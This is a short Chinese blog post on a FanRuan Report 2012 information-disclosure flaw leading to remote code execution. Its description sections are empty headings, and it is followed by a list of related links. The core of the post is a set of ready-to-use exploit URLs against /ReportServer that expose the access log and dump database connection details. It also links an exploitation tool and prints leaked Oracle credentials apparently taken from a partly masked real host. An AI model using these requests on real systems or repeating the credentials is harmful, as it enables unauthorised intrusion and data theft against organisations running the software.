帆软报表 2012 信息泄露漏洞导致RCE

其生

阅读 103

2022-04-25

漏洞描述

漏洞影响

空间测绘

漏洞复现

访问ip日志EXP

http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false

✅ 数据库信息泄露

http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo

✅ 数据库利用工具RCE

https://github.com/safe6Sec/PentestDB

数据库信息：
{"connection":[{"name":"sdykdx","driver":"oracle.jdbc.driver.OracleDriver","password":"sdykdx","user":"sdykdx","url":"jdbc:oracle:thin:@202.204.xxx.117:1521:orcl"}],"fr_platform_version":1650895353052}

相关推荐
小沙坨
 帆软报表-js脚本-控制
小沙坨 162 0 0
guanguans
 帆软报表修改日志级别
guanguans 86 0 0
杰森wang
 帆软报表 V8 get_geo_json 任意文件读取漏洞
杰森wang 80 0 0
萧萧雨潇潇
 帆软报表导出各种格式之后台导出
萧萧雨潇潇 141 0 0
骑在牛背上看书
 开发日志：OpenSSL 信息泄露漏洞
骑在牛背上看书 43 0 0
夏沐沐
 rce 漏洞
夏沐沐 72 0 0
E_topia
 Pikachu漏洞靶场 敏感信息泄露
E_topia 131 0 0
何以至千里
 Microsoft Windows SMB信息泄露漏洞
何以至千里 60 0 0
覃榜言
 由ctfhub信息泄露题型对常见信息泄露漏洞总结
覃榜言 101 0 0
Android开发指南
 【漏洞复现】Apache OFBiz 路径遍历导致RCE漏洞(CVE-2024-36104)
Android开发指南 9 0 0

精彩评论（0）